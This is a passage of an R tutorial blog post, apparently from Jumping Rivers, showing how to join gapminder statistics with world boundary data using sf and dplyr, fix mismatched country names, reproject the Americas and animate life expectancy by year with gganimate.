## 6 Micronesia GU Guam
## geometry
## 1 MULTIPOLYGON (((145.6333 14...
## 2 MULTIPOLYGON (((146.6827 43...
## 3 MULTIPOLYGON (((9.4475 42.6...
## 4 MULTIPOLYGON (((20.26102 46...
## 5 MULTIPOLYGON (((-53.3743 -3...
## 6 MULTIPOLYGON (((144.7094 13...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;One of the nice things about the &lt;code&gt;{sf}&lt;/code&gt; package is that it stores
geographical data in a specialised data-frame structure which allows us
to merge our boundary data with the gapminder statistics using the same
functions that we would use to combine more typical data-frames. Here we
join the two datasets, matching the entries by country name, using the
&lt;a href="url"&gt;dplyr&lt;/a&gt; &lt;code&gt;left_join&lt;/code&gt; function.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;joined &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;left_join&lt;/span&gt;(gapminder_unfiltered,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; world,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;country&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;name&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_as_sf&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(joined)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## Simple feature collection with 6 features and 12 fields
## Geometry type: MULTIPOLYGON
## Dimension: XY
## Bounding box: xmin: 60.50417 ymin: 29.40611 xmax: 74.91574 ymax: 38.47198
## Geodetic CRS: WGS 84
## # A tibble: 6 × 13
## country continent year lifeExp pop gdpPercap iso3 status color_code
## &amp;lt;chr&amp;gt; &amp;lt;fct&amp;gt; &amp;lt;int&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;int&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt;
## 1 Afghanistan Asia 1952 28.8 8425333 779. AFG Membe… AFG
## 2 Afghanistan Asia 1957 30.3 9240934 821. AFG Membe… AFG
## 3 Afghanistan Asia 1962 32.0 10267083 853. AFG Membe… AFG
## 4 Afghanistan Asia 1967 34.0 11537966 836. AFG Membe… AFG
## 5 Afghanistan Asia 1972 36.1 13079460 740. AFG Membe… AFG
## 6 Afghanistan Asia 1977 38.4 14880372 786. AFG Membe… AFG
## # ℹ 4 more variables: region &amp;lt;chr&amp;gt;, iso_3166_1_ &amp;lt;chr&amp;gt;, french_shor &amp;lt;chr&amp;gt;,
## # geometry &amp;lt;MULTIPOLYGON [°]&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-animated-map"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;I am going to select the country column and plot that using the base R
&lt;code&gt;plot&lt;/code&gt; function for a quick visualisation.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;joined &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;country&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/animated-map/img/first-plotunnamed-chunk-5-1.png" alt="Map of the World with some countries missing." width="672" /&gt;
&lt;p&gt;Hmmmmmmm that doesn’t look quite right does it?&lt;/p&gt;
&lt;p&gt;The issue here is a common one when grabbing a spatial boundaries file
from the internet. The data sets being joined have different names for
some of the countries. For example, in the &lt;code&gt;world&lt;/code&gt; data we have USA as
‘United States’ where as in &lt;code&gt;gapminder&lt;/code&gt; it’s ‘United States of America’.
The &lt;code&gt;dplyr::anti_join&lt;/code&gt; function can be helpful finding countries that
don’t match. I will use &lt;code&gt;fct_recode&lt;/code&gt; from {forcats} to align the &lt;code&gt;world&lt;/code&gt;
country names with &lt;code&gt;gapminder&lt;/code&gt;. In the example below, I am just fixing
the USA but you can see from the plot above that several other countries
need to be recoded (19 in total), I am doing this behind the scenes to
avoid clogging up the page.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(forcats)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;world &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; world &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fct_recode&lt;/span&gt;(.data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;United States&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;United States of America&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Okay, lets see what this looks like now.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;joined &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;country&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/animated-map/img/full-plotunnamed-chunk-8-1.png" alt="Map of the World with all countries." width="672" /&gt;
&lt;p&gt;That’s better! Now I’ve got the data I want to plot, I can use ggplot2
to start creating the visualisation that I will be animating. Before
that, I will filter the data to keep only the Americas, then use
&lt;code&gt;geom_sf&lt;/code&gt; to plot the geometry data.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(ggplot2)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;americas &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; joined &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(continent &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Americas&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;americas_plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(americas) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_sf&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/animated-map/img/americas-plot.png" class="image-center" style="width: 450px;" alt = "Map of The Americas."/&gt;
&lt;p&gt;This plot looks good but I’m going to change the coordinate reference
system (CRS) to one (“EPSG:8858”) that is designed for the Americas. I
found this CRS on &lt;a href="https://epsg.io/" rel="external"&gt;epsg.io&lt;/a&gt;, a website I would
recommend if you are looking for some different CRS’s. &lt;code&gt;st_transform&lt;/code&gt;
can be used to change the CRS to EPSG:8858. This is what it looks like
now:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;americas &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_transform&lt;/span&gt;(americas, &lt;span style="color:#a5d6ff"&gt;&amp;#34;EPSG:8858&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;new_crs_plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(americas) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_sf&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/animated-map/img/new-crs-plot.png" class="image-center" style="width: 450px;" alt = "Map of The Americas with EPSG:8858 CRS."/&gt;
&lt;p&gt;Okay so now the plot looks right we will start preparing it to be
animated.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(ggplot2)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; americas &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(year &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2007&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_sf&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lifeExp)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Year: 2007&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Life Expectancy&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_void&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ggplot2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_fill_viridis_b&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;inside&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position.inside &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.23&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.23&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;15&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.border &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/animated-map/img/static-plot.png" class="image-center" style="width: 450px;" alt = "Map of The Americas to be animated."/&gt;
&lt;p&gt;This is the plot we are going to animate now so we’ll use {gganimate}.
The &lt;code&gt;transition_states&lt;/code&gt; function partitions the data using a &lt;code&gt;states&lt;/code&gt;
column (here our ‘year’ column), iteratively creating a frame of the
animation for each year value in the input data. The next function is
&lt;code&gt;animate&lt;/code&gt; which will convert these frames into a GIF. Note, make sure
you have the dependencies installed or you may end up with 100 PNG files
in your working directory rather than a GIF!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(gganimate)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;animation &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggtitle&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Year: {closest_state}&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;transition_states&lt;/span&gt;(states &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;animate&lt;/span&gt;(animation,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; renderer &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gifski_renderer&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;img/map.gif&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; alt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Animation with missing values.&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/animated-map/img/map.gif" class="image-center" style="width: 450px;" alt = "Animation with missing values."/&gt;
&lt;p&gt;The keener eyed of you will notice some countries don’t have a value for
every year.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;americas &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_drop_geometry&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;count&lt;/span&gt;(country) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(n)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## # A tibble: 36 × 2
## country n
## &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt;
## 1 French Guiana 1
## 2 Guadeloupe 1
## 3 Martinique 1
## 4 Aruba 8
## 5 Grenada 8
## 6 Netherlands Antilles 8
## 7 Suriname 8
## 8 Bahamas 10
## 9 Barbados 10
## 10 Belize 10
## # ℹ 26 more rows
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So 25 countries have 12 observations (the max), four have 10 and 8
respectively and three have 1. To fill in these blanks, I’m going to use
{tidyr} to compute some mock values using the dataset mean for each
year. The countries with one would continue with one value from from
2002.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(tidyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;completed &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; americas &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(country &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; forcats&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fct_drop&lt;/span&gt;(country)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;complete&lt;/span&gt;(year, country) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(country, lifeExp, year) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(year) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(lifeExp &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;replace_na&lt;/span&gt;(lifeExp,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; replace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(lifeExp,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; na.rm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;geoms &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; americas &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(country) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;distinct&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;left_join&lt;/span&gt;(completed,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; geoms,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;country&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_as_sf&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_transform&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;EPSG:8858&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_sf&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lifeExp)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
